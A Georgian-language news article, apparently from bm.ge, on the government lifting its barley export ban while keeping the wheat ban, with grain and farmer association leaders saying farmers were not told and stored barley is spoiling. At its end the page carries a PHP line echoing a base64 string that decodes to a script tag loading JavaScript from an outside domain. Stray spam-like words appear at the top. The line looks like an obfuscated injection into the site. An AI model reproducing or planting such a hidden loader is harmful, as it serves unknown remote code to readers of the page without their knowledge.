celsiusi
ავერსი შნაიდერი

საქართველოს მთავრობამ ერთი წლით საქართველოდან ხორბლისა და ქერის ექსპორტი აკრძალა. გადაწყვეტილება 2022 წლის 4 ივლისიდან ამოქმედდა. მაშინ სოფლის მეურნეობის მინისტრმა ოთარ შამუგიამ განმარტა, რომ რეგიონში შექმნილი ვითარების გათვალისწინებით, სასურსათო უსაფრთხოების უზრუნველსაყოფად, მნიშვნელოვანი იყო, ადგილობრივი წარმოების ხორბლის და ქერის რეალიზაცია მხოლოდ შიდა ბაზარზე განხორციელებულიყო.

მთავრობის შესაბამისი განკარგულება 2023 წლის 4 ივლისამდე იყო ძალაში, თუმცა როგორც bm.ge-მ გაარკვია, შეზღუდვა ქერის ექსპორტზე მოიხნა. სოფლის მეურნეობის სამინისტროში აცხადებენ, რომ ექსპორტზე დაწესებული შეზღუდვა ნარჩუნდება ხორბლის შემთხვევაში.

მნიშვნელოვანი გარემოებაა, რომ მთავრობის შესაბამის განკარგულებაში შეტანილ ცვლილებებზე ფერმერები ინფორმირებული არ არიან. ტონობით ქერი, რომელიც ძირითადად საექსპორტო ბაზრისთვის იყო გათვლილი, თვეებია დასაწყობებულია და პარაზიტის გამო ნადგურდება.

„სეზონზე, როცა იყო ნედლეულის აღების პერიოდი, სახელმწიფომ მიიღო გადაწყვეტილება, რომ ქერის და ხორბლის გატანა ირანში და სხვა ქვეყნებში აიკრძალა. ეს სასურსათო უსაფრთხოებისთვის გამართლებულ ნაბიჯად ჩაითვალა იმ პერიოდში, მაგრამ ახლა ვხედავთ, რომ არის ჭარბი მოსავალი და ექსპორტზე ვერ გადის“,- აცხადებს მარცვლეულის მწარმოებელთა ასოციაციის ხელმძღვანელი ნიკოლოზ ბენიაიძე.

„ახლა არის ის პერიოდი, როცა ფერმერებს სჭირდებათ ფული, რათა მიმდინარე წლისთვის ნაკვეთები დაამუშაონ, შეიტანონ სასუქი, შეიტანონ ჰერბიციდები, რათა უკეთესი მოსავალი მიიღონ. ახლა არის ფასი საკმაოდ დაბალი, თუ იგივე მოსავლის აღებისას ქერი ღირდა 90 თეთრი, ახლა 60 თეთრია, მაშინ როცა გაზრდილია ყველაფერზე ფასები, ამიტომ სავალალო მდგომარეობაა. ჩვენთანაც ზარები ფერმერებიდან ყოველდღიურად შემოდის, რომ როგორმე შევძლოთ მათი დახმარება.

ქერის ფუჭდება, გაჩენილია ტილი. აქედან გამომდინარე მწვავე სიტუაციაა ამ მიმართულებით“, - აცხადებს რატი კოჭლამაზიშვილი, ფერმერთა ასოციაციის თავმჯდომარის მოადგილე.

436
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");